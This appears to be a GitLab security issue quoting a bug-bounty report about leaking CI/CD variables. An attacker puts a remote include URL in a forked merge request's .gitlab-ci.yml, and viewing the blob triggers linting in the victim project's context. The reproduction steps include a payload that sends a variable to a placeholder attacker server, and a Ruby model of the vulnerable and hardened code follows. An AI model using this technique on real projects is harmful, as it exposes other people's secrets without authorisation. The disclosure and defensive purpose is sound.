Backend: Leaking CI variables by visiting the blob page via fork MRs
⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.
HackerOne report #1875515 by shells3c
on 2023-02-15, assigned to @cmaxim:
Report
SSOT
Refer to #417275 (closed)
Summary
When viewing the GitLab CI configuration, GitLab runs CI linting on the file content:
app/models/blob_viewer/gitlab_ci_yml.rb
    def validation_message(opts)
      return @validation_message if defined?(@validation_message)

      prepare!

      @validation_message = Gitlab::Ci::Lint
        .new(project: opts[:project], current_user: opts[:user], sha: opts[:sha])
        .validate(blob.data).errors.first
    end
The CI validation is run within the context of the viewed project, therefore the project's CI variables can be used here. blob.data is the CI configuration content from a blob of the project and can be manipulated, because even without Developer permission I can still push a blob to the project by creating a merge request (commits of a merge request are fetched into the repository object pool). This allows me to run CI lint on the project without the create_pipeline permission (the permission is checked in the CI lint API and GraphQL).
Steps to reproduce
- Create a project and create a CI variable in General > CI/CD > Variables, let's say variable_x
- As the attacker, fork the project and edit the CI configuration (.gitlab-ci.yml by default) with the following content (replace <ATTACKER SERVER>):
      include:
        remote: 'http://<ATTACKER SERVER>/${variable_x}.yaml'
- Create a merge request with the previous change
- Now grab the commit SHA and visit this link; the variable will be sent to your server: https://gitlab.com/<victim>/<project>/-/blob/<sha>/.gitlab-ci.yml
Output of checks
This bug happens on GitLab.com
Impact
Unauthorized users can leak CI variables
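As an added illustration (not GitLab's code and not part of the report), the following Ruby model reduces the mechanism from the summary and the reproduction steps to a toy: a linter that resolves include: remote: URLs with the project's variables, a vulnerable validation_message that runs it for any viewer of the blob, and a hardened variant gated on a create_pipeline-style permission in the viewed project. Project, Lint and the permission helper are assumed names, and GitLab's actual fix may differ.

```ruby
# Constructed model of the bug: a project with a CI/CD variable that must not
# reach anyone who can merely view a blob. Names here are hypothetical.
Project = Struct.new(:path, :variables, :maintainers)

class Project
  # Stand-in for the create_pipeline permission the CI lint API checks.
  def allows_create_pipeline?(user)
    maintainers.include?(user)
  end
end

# Toy linter: before a real linter can validate a remote include it resolves
# the URL, interpolating ${VAR} from the project's CI variables, then fetches
# it. Here the fetch is recorded instead of performed.
class Lint
  URL_RE = %r{^\s*remote:\s*'([^']*)'}

  attr_reader :fetched, :errors

  def initialize(project:)
    @project = project
    @fetched = []
    @errors = []
  end

  def validate(yaml)
    yaml.scan(URL_RE).flatten.each do |url|
      resolved = url.gsub(/\$\{(\w+)\}/) { @project.variables.fetch($1, "") }
      @fetched << resolved # the real linter would issue an HTTP request here
    end
    @errors << "no include found" if @fetched.empty?
    self
  end
end

# Vulnerable form (mirrors the report): lint runs in the project's context for
# whoever views the blob, so the variable value lands in the outbound URL.
def validation_message_vulnerable(project, _user, blob_data)
  Lint.new(project: project).validate(blob_data).fetched
end

# Hardened form (an assumed fix): refuse to lint unless the viewer may create
# pipelines in the project whose variables the lint would expand.
def validation_message_hardened(project, user, blob_data)
  return [] unless project.allows_create_pipeline?(user)

  Lint.new(project: project).validate(blob_data).fetched
end
```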
Proposal
How To Reproduce
Please add reproducibility information to this section: